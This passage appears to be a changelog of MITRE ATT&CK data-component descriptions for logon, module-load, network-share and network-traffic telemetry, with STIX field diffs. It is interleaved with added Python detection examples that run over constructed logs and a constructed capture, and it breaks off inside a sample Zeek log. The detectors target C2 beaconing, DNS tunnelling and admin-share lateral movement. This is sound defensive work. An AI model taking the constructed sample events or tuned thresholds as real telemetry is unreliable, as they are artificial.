- Account Name: JohnDoe
- Source Network Address: 192.168.1.100
- Authentication Package: NTLM
- Linux Systems
- /var/log/utmp or /var/log/wtmp:
- Log format: login user [tty] from [source_ip]
- User: jane
- IP: 10.0.0.5
- Timestamp: 2024-12-28 08:30:00
- macOS Systems
- /var/log/asl.log or unified logging framework:
- Log: com.apple.securityd: Authentication succeeded for user 'admin'
- Cloud Environments
- Azure Sign-In Logs:
- Activity: Sign-in successful
- Client App: Browser
- Location: Unknown (Country: X)
- Google Workspace
- Activity: Login
- Event Type: successful_login
- Source IP: 203.0.113.55
This data component can be collected through the following measures:
- Windows Systems
- Event Logs: Monitor Security Event Logs using Event ID 4624 for successful logons.
- PowerShell Example: `Get-EventLog -LogName Security -InstanceId 4624`
- Linux Systems
- Log Files: Monitor `/var/log/utmp`, `/var/log/wtmp`, or `/var/log/auth.log` for logon events.
- Tools: Use `last` or `who` commands to parse login records.
- macOS Systems
- Log Sources: Monitor `/var/log/asl.log` or Apple Unified Logs using the `log show` command.
- Command Example: `log show --predicate 'eventMessage contains "Authentication succeeded"' --info`
- Cloud Environments
- Azure AD: Use Azure Monitor to analyze sign-in logs. Example CLI Query: `az monitor log-analytics query -w <workspace_id> --analytics-query "AzureActivity | where ActivityStatus == 'Success' and OperationName == 'Sign-in'"`
- Google Workspace: Enable and monitor Login Audit logs from the Admin Console.
- Office 365: Use Audit Log Search in Microsoft 365 Security & Compliance Center for login-related events.
- Network Logs
- Sources: Network authentication mechanisms (e.g., RADIUS or TACACS logs).
- Enable EDR Monitoring:
- EDR tools monitor logon session activity, including the creation of new sessions.
- Configure alerts for: Suspicious logon types (e.g., Logon Type 10 for RDP or Type 5 for Service). Logons from unusual locations, accounts, or devices.
- Leverage EDR telemetry for session attributes like source IP, session duration, and originating process. |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
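The EDR bullet above asks for alerts on suspicious logon types and on logons from unusual locations. As an added example that is not ATT&CK's own content, the Python below applies exactly those two rules to a handful of constructed Security Event ID 4624 records (field names follow the event XML): it flags Logon Type 10 and 5 as the description suggests, and flags any source address that falls outside the internal networks. `TRUSTED_NETWORKS`, `SUSPICIOUS_LOGON_TYPES`, `LOCAL_SOURCES` and the sample events are assumptions made for the example.

```python
import ipaddress

# Assumptions for this example: the organisation's internal address space, and the
# logon types the data component description singles out for alerting.
TRUSTED_NETWORKS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16")]
SUSPICIOUS_LOGON_TYPES = {10: "RemoteInteractive (RDP)", 5: "Service"}
LOCAL_SOURCES = {"-", "::1", "127.0.0.1"}   # console and service logons carry no network address

# Constructed sample of parsed Security 4624 events.
SAMPLE_4624 = [
    {"TimeCreated": "2024-12-28T08:30:00Z", "TargetUserName": "JohnDoe", "LogonType": 2,
     "IpAddress": "192.168.1.100", "AuthenticationPackageName": "Kerberos"},
    {"TimeCreated": "2024-12-28T08:31:10Z", "TargetUserName": "JohnDoe", "LogonType": 10,
     "IpAddress": "203.0.113.55", "AuthenticationPackageName": "NTLM"},
    {"TimeCreated": "2024-12-28T08:32:45Z", "TargetUserName": "svc_backup", "LogonType": 5,
     "IpAddress": "-", "AuthenticationPackageName": "Negotiate"},
    {"TimeCreated": "2024-12-28T08:33:02Z", "TargetUserName": "jane", "LogonType": 3,
     "IpAddress": "10.0.0.5", "AuthenticationPackageName": "Kerberos"},
]


def is_trusted_source(ip: str) -> bool:
    """True for local logons and for addresses inside the trusted networks."""
    if ip in LOCAL_SOURCES:
        return True
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False          # malformed field: treat as untrusted so an analyst reviews it
    return any(addr in net for net in TRUSTED_NETWORKS)


def evaluate_logon(event: dict) -> list:
    """Return the reasons a single 4624 event should be alerted on (empty if none)."""
    reasons = []
    logon_type = int(event["LogonType"])
    if logon_type in SUSPICIOUS_LOGON_TYPES:
        reasons.append(f"logon type {logon_type} ({SUSPICIOUS_LOGON_TYPES[logon_type]})")
    if not is_trusted_source(event["IpAddress"]):
        reasons.append(f"source {event['IpAddress']} is outside trusted networks")
    return reasons


def logon_alerts(events: list) -> list:
    """Run the rules over a batch of events and keep only those with findings."""
    alerts = []
    for event in events:
        reasons = evaluate_logon(event)
        if reasons:
            alerts.append({"time": event["TimeCreated"], "account": event["TargetUserName"],
                           "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in logon_alerts(SAMPLE_4624):
        print(alert)
```

Type 5 (Service) logons are frequent on any server, so in production the second rule is normally narrowed to service accounts that are not expected to start services on that host; the example keeps the description's wording.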
Module: Module Load
Current version: 1.1
Version changed from: 1.0 → 1.1
Old description:
Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7)

New description:
When a process or program dynamically attaches a shared library, module, or plugin into its memory space. This action is typically performed to extend the functionality of an application, access shared system resources, or interact with kernel-mode components.
*Data Collection Measures:*
- Event Logging (Windows):
  - Sysmon Event ID 7: Logs when a DLL is loaded into a process.
  - Windows Security Event ID 4688: Captures process creation events, often useful for correlating module loads.
  - Windows Defender ATP: Can provide visibility into suspicious module loads.
- Event Logging (Linux/macOS):
  - AuditD (`execve` and `open` syscalls): Captures when shared libraries (`.so` files) are loaded.
  - Ltrace/Strace: Monitors process behavior, including library calls (`dlopen`, `execve`).
  - MacOS Endpoint Security Framework (ESF): Monitors library loads (`ES_EVENT_TYPE_NOTIFY_DYLD_INSERT_LIBRARIES`).
- Endpoint Detection & Response (EDR):
  - Provide real-time telemetry on module loads and process injections.
  - Sysinternals Process Monitor (`procmon`): Captures loaded modules and their execution context.
- Memory Forensics:
  - Volatility Framework (`malfind`, `ldrmodules`): Detects injected DLLs and anomalous module loads.
  - Rekall Framework: Useful for kernel-mode module detection.
- SIEM and Log Analysis:
  - Centralized log aggregation to correlate suspicious module loads across the environment.
  - Detection rules using correlation searches and behavioral analytics.
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:12:16.486Z |
description | Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7) | When a process or program dynamically attaches a shared library, module, or plugin into its memory space. This action is typically performed to extend the functionality of an application, access shared system resources, or interact with kernel-mode components.
*Data Collection Measures:*
- Event Logging (Windows):
- Sysmon Event ID 7: Logs when a DLL is loaded into a process.
- Windows Security Event ID 4688: Captures process creation events, often useful for correlating module loads.
- Windows Defender ATP: Can provide visibility into suspicious module loads.
- Event Logging (Linux/macOS):
- AuditD (`execve` and `open` syscalls): Captures when shared libraries (`.so` files) are loaded.
- Ltrace/Strace: Monitors process behavior, including library calls (`dlopen`, `execve`).
- MacOS Endpoint Security Framework (ESF): Monitors library loads (`ES_EVENT_TYPE_NOTIFY_DYLD_INSERT_LIBRARIES`).
- Endpoint Detection & Response (EDR):
- Provide real-time telemetry on module loads and process injections.
- Sysinternals Process Monitor (`procmon`): Captures loaded modules and their execution context.
- Memory Forensics:
- Volatility Framework (`malfind`, `ldrmodules`): Detects injected DLLs and anomalous module loads.
- Rekall Framework: Useful for kernel-mode module detection.
- SIEM and Log Analysis:
- Centralized log aggregation to correlate suspicious module loads across the environment.
- Detection rules using correlation searches and behavioral analytics. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Network Traffic: Network Connection Creation
Current version: 1.2
Version changed from: 1.1 → 1.2
Old description:
Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)

New description:
The initial establishment of a network session, where a system or process initiates a connection to a local or remote endpoint. This typically involves capturing socket information (source/destination IP, ports, protocol) and tracking session metadata. Monitoring these events helps detect lateral movement, exfiltration, and command-and-control (C2) activities.
*Data Collection Measures:*
- Windows:
  - Event ID 5156 – Filtering Platform Connection: Logs network connections permitted by Windows Filtering Platform (WFP).
  - Sysmon Event ID 3 – Network Connection Initiated: Captures process, source/destination IP, ports, and parent process.
- Linux/macOS:
  - Netfilter (iptables), nftables logs: Tracks incoming and outgoing network connections.
  - AuditD (`connect` syscall): Logs TCP, UDP, and ICMP connections.
  - Zeek (`conn.log`): Captures protocol, duration, and bytes transferred.
- Cloud & Network Infrastructure:
  - AWS VPC Flow Logs / Azure NSG Flow Logs: Logs IP traffic at the network level in cloud environments.
  - Zeek (conn.log) or Suricata (network events): Captures packet metadata for detection and correlation.
- Endpoint Detection & Response (EDR):
  - Detect anomalous network activity such as new C2 connections or data exfiltration attempts.
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-20T20:18:06.745Z | 2025-04-18T15:11:23.639Z |
description | Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log) | The initial establishment of a network session, where a system or process initiates a connection to a local or remote endpoint. This typically involves capturing socket information (source/destination IP, ports, protocol) and tracking session metadata. Monitoring these events helps detect lateral movement, exfiltration, and command-and-control (C2) activities.
*Data Collection Measures:*
- Windows:
- Event ID 5156 – Filtering Platform Connection - Logs network connections permitted by Windows Filtering Platform (WFP).
- Sysmon Event ID 3 – Network Connection Initiated - Captures process, source/destination IP, ports, and parent process.
- Linux/macOS:
- Netfilter (iptables), nftables logs - Tracks incoming and outgoing network connections.
- AuditD (`connect` syscall) - Logs TCP, UDP, and ICMP connections.
- Zeek (`conn.log`) - Captures protocol, duration, and bytes transferred.
- Cloud & Network Infrastructure:
- AWS VPC Flow Logs / Azure NSG Flow Logs - Logs IP traffic at the network level in cloud environments.
- Zeek (conn.log) or Suricata (network events) - Captures packet metadata for detection and correlation.
- Endpoint Detection & Response (EDR):
- Detect anomalous network activity such as new C2 connections or data exfiltration attempts. |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Network Share: Network Share Access
Current version: 1.1
Version changed from: 1.0 → 1.1
Old description:
Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145)

New description:
Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145)
*Data Collection Measures:*
- Windows:
  - Event ID 5140 – Network Share Object Access: Logs every access attempt to a network share.
  - Event ID 5145 – Detailed Network Share Object Access: Captures granular access control information, including the requesting user, source IP, and access permissions.
  - Sysmon Event ID 3 – Network Connection Initiated: Helps track SMB connections to suspicious or unauthorized network shares.
  - Enable Audit Policy for Network Share Access: `auditpol /set /subcategory:"File Share" /success:enable /failure:enable`
  - Enable PowerShell Logging to Detect Unauthorized SMB Access: `Set-ExecutionPolicy RemoteSigned`
  - Restrict Network Share Access with Group Policy (GPO): `Computer Configuration → Windows Settings → Security Settings → Local Policies → User Rights Assignment`. Set "Access this computer from the network" to restrict unauthorized accounts.
- Linux/macOS:
  - AuditD (`open`, `read`, `write`, `connect` syscalls): Detects access to NFS, CIFS, and SMB network shares.
  - Lsof (`lsof | grep nfs` or `lsof | grep smb`): Identifies active network share connections.
  - Mount (`mount | grep nfs` or `mount | grep cifs`): Lists currently mounted network shares.
  - Enable AuditD for SMB/NFS Access: `auditctl -a always,exit -F arch=b64 -S open -F path=/mnt/share -k network_share_access`
  - Monitor Active Network Shares Using Netstat: `netstat -an | grep :445`
- Endpoint Detection & Response (EDR):
  - Detects abnormal network share access behavior, such as unusual account usage, large file transfers, or encrypted file activity.
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:10:01.621Z |
description | Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145) | Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145)
*Data Collection Measures:*
- Windows:
- Event ID 5140 – Network Share Object Access Logs every access attempt to a network share.
- Event ID 5145 – Detailed Network Share Object Access Captures granular access control information, including the requesting user, source IP, and access permissions.
- Sysmon Event ID 3 – Network Connection Initiated Helps track SMB connections to suspicious or unauthorized network shares.
- Enable Audit Policy for Network Share Access: `auditpol /set /subcategory:"File Share" /success:enable /failure:enable`
- Enable PowerShell Logging to Detect Unauthorized SMB Access: `Set-ExecutionPolicy RemoteSigned`
- Restrict Network Share Access with Group Policy (GPO): `Computer Configuration → Windows Settings → Security Settings → Local Policies → User Rights Assignment` Set "Access this computer from the network" to restrict unauthorized accounts.
- Linux/macOS:
- AuditD (`open`, `read`, `write`, `connect` syscalls) Detects access to NFS, CIFS, and SMB network shares.
- Lsof (`lsof | grep nfs` or `lsof | grep smb`) Identifies active network share connections.
- Mount (`mount | grep nfs` or `mount | grep cifs`) Lists currently mounted network shares.
- Enable AuditD for SMB/NFS Access: `auditctl -a always,exit -F arch=b64 -S open -F path=/mnt/share -k network_share_access`
- Monitor Active Network Shares Using Netstat: `netstat -an | grep :445`
- Endpoint Detection & Response (EDR):
- Detects abnormal network share access behavior, such as unusual account usage, large file transfers, or encrypted file activity. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
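Event ID 5145 is the richest source listed above because it carries the requesting account, source address, share, relative path and an access mask, but the mask is a raw bit field. As an added example that is not ATT&CK's or Microsoft's own content, the Python below decodes the mask into named rights and applies one rule over constructed 5145 records: access to an administrative share (ADMIN$ or a hidden drive share such as C$) from a host that is not an expected administration source, rated higher when the mask includes a write or delete right. The `ACCESS_RIGHTS` bit names follow the Windows file access-mask constants; `ADMIN_SOURCES` and the sample events are assumptions made for the example.

```python
# File/directory access-mask bits as they appear in the 5145 AccessMask field.
ACCESS_RIGHTS = {
    0x00001: "ReadData/ListDirectory", 0x00002: "WriteData/AddFile", 0x00004: "AppendData/AddSubdirectory",
    0x00008: "ReadEA", 0x00010: "WriteEA", 0x00020: "Execute/Traverse", 0x00040: "DeleteChild",
    0x00080: "ReadAttributes", 0x00100: "WriteAttributes", 0x10000: "DELETE", 0x20000: "READ_CONTROL",
    0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER", 0x100000: "SYNCHRONIZE",
}
WRITE_BITS = 0x00002 | 0x00004 | 0x00040 | 0x10000 | 0x40000 | 0x80000

# Assumption for this example: hosts from which administrative share access is expected.
ADMIN_SOURCES = {"10.0.0.20"}

# Constructed sample of parsed Security 5145 events.
SAMPLE_5145 = [
    {"SubjectUserName": "jane", "IpAddress": "10.0.0.5", "ShareName": r"\\*\Finance",
     "RelativeTargetName": r"Q4\budget.xlsx", "AccessMask": "0x1"},
    {"SubjectUserName": "admin_t1", "IpAddress": "10.0.0.20", "ShareName": r"\\*\ADMIN$",
     "RelativeTargetName": r"Temp\agent.msi", "AccessMask": "0x2"},
    {"SubjectUserName": "JohnDoe", "IpAddress": "192.168.1.100", "ShareName": r"\\*\ADMIN$",
     "RelativeTargetName": "svc.exe", "AccessMask": "0x120196"},
    {"SubjectUserName": "JohnDoe", "IpAddress": "192.168.1.100", "ShareName": r"\\*\C$",
     "RelativeTargetName": r"Users\jane\Documents", "AccessMask": "0x1"},
]


def decode_access_mask(mask) -> list:
    """Translate a numeric or '0x..' AccessMask into the right names it contains."""
    value = int(mask, 16) if isinstance(mask, str) else int(mask)
    return [name for bit, name in sorted(ACCESS_RIGHTS.items()) if value & bit]


def is_admin_share(share_name: str) -> bool:
    """ADMIN$ and the hidden drive shares (C$, D$, ...); IPC$ is excluded as too noisy."""
    name = share_name.rsplit("\\", 1)[-1].upper()
    return name == "ADMIN$" or (len(name) == 2 and name[0].isalpha() and name[1] == "$")


def evaluate_share_access(event: dict):
    """Alert on admin-share access from an unexpected source; None when the event is benign."""
    if not is_admin_share(event["ShareName"]) or event["IpAddress"] in ADMIN_SOURCES:
        return None
    value = int(event["AccessMask"], 16)
    return {
        "account": event["SubjectUserName"], "source": event["IpAddress"],
        "share": event["ShareName"], "target": event["RelativeTargetName"],
        "rights": decode_access_mask(value),
        "severity": "high" if value & WRITE_BITS else "medium",
    }


def share_alerts(events: list) -> list:
    return [alert for alert in (evaluate_share_access(e) for e in events) if alert]


if __name__ == "__main__":
    for alert in share_alerts(SAMPLE_5145):
        print(alert)
```

Because 5145 logs one event per object access, a single file copy over ADMIN$ produces several records; deduplicating on (account, source, share, target) before alerting keeps the volume manageable.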
Network Traffic: Network Traffic Content
Current version: 1.1
Version changed from: 1.0 → 1.1
Old description:
Logged network traffic data showing both protocol header and body values (ex: PCAP)

New description:
The full packet capture (PCAP) or session data that logs both protocol headers and payload content. This allows analysts to inspect command and control (C2) traffic, exfiltration, and other suspicious activity within network communications. Unlike metadata-based logs, full content analysis enables deeper protocol inspection, payload decoding, and forensic investigations.
*Data Collection Measures:*
- Network Packet Capture (Full Content Logging)
  - Wireshark / tcpdump / tshark
    - Full packet captures (PCAP files) for manual analysis or IDS correlation. `tcpdump -i eth0 -w capture.pcap`
  - Zeek (formerly Bro)
    - Extracts protocol headers and payload details into structured logs. `echo "redef Log::default_store = Log::ASCII;" > local.zeek | zeek -Cr capture.pcap local.zeek`
  - Suricata / Snort (IDS/IPS with PCAP Logging)
    - Deep packet inspection (DPI) with signature-based and behavioral analysis. `suricata -c /etc/suricata/suricata.yaml -i eth0 -l /var/log/suricata`
- Host-Based Collection
  - Sysmon Event ID 22 – DNS Query Logging: Captures DNS requests made by processes, useful for detecting C2 domains.
  - Sysmon Event ID 3 – Network Connection Initiated: Logs process-to-network connection relationships.
  - AuditD (Linux) – syscall=connect: Monitors outbound network requests from processes. `auditctl -a always,exit -F arch=b64 -S connect -k network_activity`
- Cloud & SaaS Traffic Collection
  - AWS VPC Flow Logs / Azure NSG Flow Logs / Google VPC Flow Logs: Captures metadata about inbound/outbound network traffic.
  - Cloud IDS (AWS GuardDuty, Azure Sentinel, Google Chronicle): Detects malicious activity in cloud environments by analyzing network traffic patterns.
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:11:16.672Z |
description | Logged network traffic data showing both protocol header and body values (ex: PCAP) | The full packet capture (PCAP) or session data that logs both protocol headers and payload content. This allows analysts to inspect command and control (C2) traffic, exfiltration, and other suspicious activity within network communications. Unlike metadata-based logs, full content analysis enables deeper protocol inspection, payload decoding, and forensic investigations.
*Data Collection Measures:*
- Network Packet Capture (Full Content Logging)
- Wireshark / tcpdump / tshark
- Full packet captures (PCAP files) for manual analysis or IDS correlation. `tcpdump -i eth0 -w capture.pcap`
- Zeek (formerly Bro)
- Extracts protocol headers and payload details into structured logs. `echo "redef Log::default_store = Log::ASCII;" > local.zeek | zeek -Cr capture.pcap local.zeek`
- Suricata / Snort (IDS/IPS with PCAP Logging)
- Deep packet inspection (DPI) with signature-based and behavioral analysis. `suricata -c /etc/suricata/suricata.yaml -i eth0 -l /var/log/suricata`
- Host-Based Collection
- Sysmon Event ID 22 – DNS Query Logging, Captures DNS requests made by processes, useful for detecting C2 domains.
- Sysmon Event ID 3 – Network Connection Initiated, Logs process-to-network connection relationships.
- AuditD (Linux) – syscall=connect, Monitors outbound network requests from processes. `auditctl -a always,exit -F arch=b64 -S connect -k network_activity`
- Cloud & SaaS Traffic Collection
- AWS VPC Flow Logs / Azure NSG Flow Logs / Google VPC Flow Logs, Captures metadata about inbound/outbound network traffic.
- Cloud IDS (AWS GuardDuty, Azure Sentinel, Google Chronicle), Detects malicious activity in cloud environments by analyzing network traffic patterns. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
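The description contrasts full-content capture with metadata logs: with a PCAP in hand an analyst can decode the payload itself rather than only the socket tuple. As an added example that is not ATT&CK's own content and not tcpdump's or Zeek's code, the Python below is a minimal parser for the classic pcap format (24-byte global header, 16-byte record headers, Ethernet link type) that walks each frame down through IPv4 and UDP, decodes the DNS question section of every query, and then applies a simple tunnelling heuristic (very long labels or deeply nested names) to the extracted names. The capture it reads is constructed inline by the same script, so it runs offline; `LONG_LABEL`, the addresses and the thresholds are constructed values, and pcapng files are deliberately not handled.

```python
import socket
import struct

LONG_LABEL = "aGVsbG8gd29ybGQgdGhpcyBpcyBhIHZlcnkgbG9uZyBsYWJlbA"   # constructed, 50 characters


def _encode_qname(name: str) -> bytes:
    return b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.split(".")) + b"\x00"


def build_dns_query_frame(src_ip: str, dst_ip: str, qname: str, txid: int = 0x1234) -> bytes:
    """Constructed Ethernet/IPv4/UDP frame carrying one standard A query (checksums left zero)."""
    dns = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0) + _encode_qname(qname) + struct.pack(">HH", 1, 1)
    udp = struct.pack(">HHHH", 40000, 53, 8 + len(dns), 0) + dns
    ip = struct.pack(">BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0x4000, 64, 17, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip)) + udp
    return b"\x00" * 12 + b"\x08\x00" + ip            # zeroed MACs, EtherType 0x0800 = IPv4


def build_pcap(frames: list) -> bytes:
    """Constructed little-endian classic pcap (link type 1 = Ethernet) wrapping the frames."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)]
    for i, frame in enumerate(frames):
        out.append(struct.pack("<IIII", 1_700_000_000 + i, 0, len(frame), len(frame)) + frame)
    return b"".join(out)


def _decode_qname(dns: bytes, off: int):
    labels = []
    while True:
        n = dns[off]
        if n == 0:
            return ".".join(labels), off + 1
        if n & 0xC0:            # compression pointers do not occur in a query's question section
            raise ValueError("unexpected compression pointer in question name")
        labels.append(dns[off + 1:off + 1 + n].decode("ascii", "replace"))
        off += 1 + n


def _dns_query_from_frame(frame: bytes):
    """Return (src, dst, qname, qtype) for an IPv4/UDP DNS query frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 17:                                   # protocol 17 = UDP
        return None
    udp = ip[ihl:]
    if len(udp) < 8 + 12 or struct.unpack_from(">H", udp, 2)[0] != 53:
        return None
    dns = udp[8:]
    if struct.unpack_from(">H", dns, 2)[0] & 0x8000:  # QR bit set: a response, not a query
        return None
    qname, end = _decode_qname(dns, 12)
    qtype = struct.unpack_from(">H", dns, end)[0]
    return socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20]), qname, qtype


def parse_pcap_dns_queries(data: bytes) -> list:
    """Walk the pcap records and collect (ts, src, dst, qname, qtype) for every DNS query."""
    magic = struct.unpack_from("<I", data, 0)[0]
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    if struct.unpack_from(endian + "I", data, 20)[0] != 1:
        raise ValueError("only the Ethernet link type is handled")
    off, queries = 24, []
    while off + 16 <= len(data):
        ts_sec, _ts_usec, incl_len, _orig_len = struct.unpack_from(endian + "IIII", data, off)
        off += 16
        frame, off = data[off:off + incl_len], off + incl_len
        parsed = _dns_query_from_frame(frame)
        if parsed:
            queries.append((ts_sec,) + parsed)
    return queries


def suspicious_queries(queries: list, max_label: int = 40, max_labels: int = 5) -> list:
    """Flag names with very long labels or deep nesting, the usual shape of DNS tunnelling."""
    flagged = []
    for q in queries:
        labels = q[3].split(".")
        if max(len(label) for label in labels) > max_label or len(labels) > max_labels:
            flagged.append(q)
    return flagged


# Constructed capture: one ordinary lookup and one query carrying an encoded 50-character label.
SAMPLE_PCAP = build_pcap([
    build_dns_query_frame("10.0.0.5", "10.0.0.53", "www.example.com"),
    build_dns_query_frame("10.0.0.5", "10.0.0.53", LONG_LABEL + ".tunnel.example.net"),
])
```

The same parser applied to a real `tcpdump -w` file needs only `open(path, "rb").read()` in place of `SAMPLE_PCAP`; the heuristic thresholds should be tuned against the site's own baseline, since CDN and anti-spam lookups legitimately produce long names.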
Network Traffic: Network Traffic Flow
Current version: 1.1
Version changed from: 1.0 → 1.1
Old description:
Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)

New description:
Summarized network packet data that captures session-level details such as source/destination IPs, ports, protocol types, timestamps, and data volume, without storing full packet payloads. This is commonly used for traffic analysis, anomaly detection, and network performance monitoring.
*Data Collection Measures:*
- Network Flow Logs (Metadata Collection)
  - NetFlow
    - Summarized metadata for network conversations (no packet payloads).
  - sFlow (Sampled Flow Logging)
    - Captures sampled packets from switches and routers.
    - Used for real-time traffic monitoring and anomaly detection.
  - Zeek (Bro) Flow Logs
    - Zeek logs session-level details in logs like conn.log, http.log, dns.log, etc.
- Host-Based Collection
  - Sysmon Event ID 3 – Network Connection Initiated
    - Logs process-level network activity, useful for detecting malicious outbound connections.
  - AuditD (Linux) – syscall=connect
    - Monitors system calls for network connections. `auditctl -a always,exit -F arch=b64 -S connect -k network_activity`
- Cloud & SaaS Flow Monitoring
  - AWS VPC Flow Logs
    - Captures metadata for traffic between EC2 instances, security groups, and internet gateways.
  - Azure NSG Flow Logs / Google VPC Flow Logs
    - Logs ingress/egress traffic for cloud-based resources.
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:11:20.168Z |
description | Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log) | Summarized network packet data that captures session-level details such as source/destination IPs, ports, protocol types, timestamps, and data volume, without storing full packet payloads. This is commonly used for traffic analysis, anomaly detection, and network performance monitoring.
*Data Collection Measures:*
- Network Flow Logs (Metadata Collection)
- NetFlow
- Summarized metadata for network conversations (no packet payloads).
- sFlow (Sampled Flow Logging)
- Captures sampled packets from switches and routers.
- Used for real-time traffic monitoring and anomaly detection.
- Zeek (Bro) Flow Logs
- Zeek logs session-level details in logs like conn.log, http.log, dns.log, etc.
- Host-Based Collection
- Sysmon Event ID 3 – Network Connection Initiated
- Logs process-level network activity, useful for detecting malicious outbound connections.
- AuditD (Linux) – syscall=connect
- Monitors system calls for network connections. `auditctl -a always,exit -F arch=b64 -S connect -k network_activity`
- Cloud & SaaS Flow Monitoring
- AWS VPC Flow Logs
- Captures metadata for traffic between EC2 instances, security groups, and internet gateways.
- Azure NSG Flow Logs / Google VPC Flow Logs
- Logs ingress/egress traffic for cloud-based resources. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
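Both Network Connection Creation and Network Traffic Flow above name Zeek's `conn.log` and say that session metadata is enough to find command-and-control activity without payloads. As an added example serving both descriptions, and not ATT&CK's or Zeek's own code, the Python below parses a constructed `conn.log` excerpt using the file's own `#fields` header, groups connections by (originator, responder, responder port), and flags groups whose inter-connection intervals are nearly constant: the low coefficient of variation that distinguishes a beacon from interactive or DNS traffic. The log lines, the minimum count and the CV threshold are constructed values for the example.

```python
import statistics
from collections import defaultdict

# Constructed Zeek conn.log excerpt: TSV with the standard #fields header, trimmed to a few columns.
# 10.0.0.5 -> 203.0.113.55:443 repeats every ~60 s; its DNS traffic and 10.0.0.7's web traffic do not.
SAMPLE_CONN_LOG = """#separator \\x09
#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice\tduration\torig_bytes\tresp_bytes\tconn_state
1700000000.000000\tCabc1\t10.0.0.5\t51012\t203.0.113.55\t443\ttcp\tssl\t0.410\t512\t1024\tSF
1700000003.100000\tCabc2\t10.0.0.5\t40001\t10.0.0.53\t53\tudp\tdns\t0.010\t60\t120\tSF
1700000005.000000\tCabc3\t10.0.0.7\t50220\t93.184.216.34\t80\ttcp\thttp\t1.200\t800\t45000\tSF
1700000013.100000\tCabc4\t10.0.0.5\t40002\t10.0.0.53\t53\tudp\tdns\t0.009\t61\t119\tSF
1700000014.100000\tCabc5\t10.0.0.5\t40003\t10.0.0.53\t53\tudp\tdns\t0.011\t58\t130\tSF
1700000059.800000\tCabc6\t10.0.0.5\t51013\t203.0.113.55\t443\ttcp\tssl\t0.395\t512\t1024\tSF
1700000048.100000\tCabc7\t10.0.0.5\t40004\t10.0.0.53\t53\tudp\tdns\t0.012\t63\t125\tSF
1700000049.100000\tCabc8\t10.0.0.5\t40005\t10.0.0.53\t53\tudp\tdns\t0.010\t59\t118\tSF
1700000120.300000\tCabc9\t10.0.0.5\t51014\t203.0.113.55\t443\ttcp\tssl\t0.402\t512\t1024\tSF
1700000133.100000\tCabca\t10.0.0.5\t40006\t10.0.0.53\t53\tudp\tdns\t0.010\t62\t121\tSF
1700000180.100000\tCabcb\t10.0.0.5\t51015\t203.0.113.55\t443\ttcp\tssl\t0.388\t512\t1024\tSF
1700000239.900000\tCabcc\t10.0.0.5\t51016\t203.0.113.55\t443\ttcp\tssl\t0.401\t512\t1024\tSF
1700000300.200000\tCabcd\t10.0.0.5\t51017\t203.0.113.55\t443\ttcp\tssl\t0.399\t512\t1024\tSF
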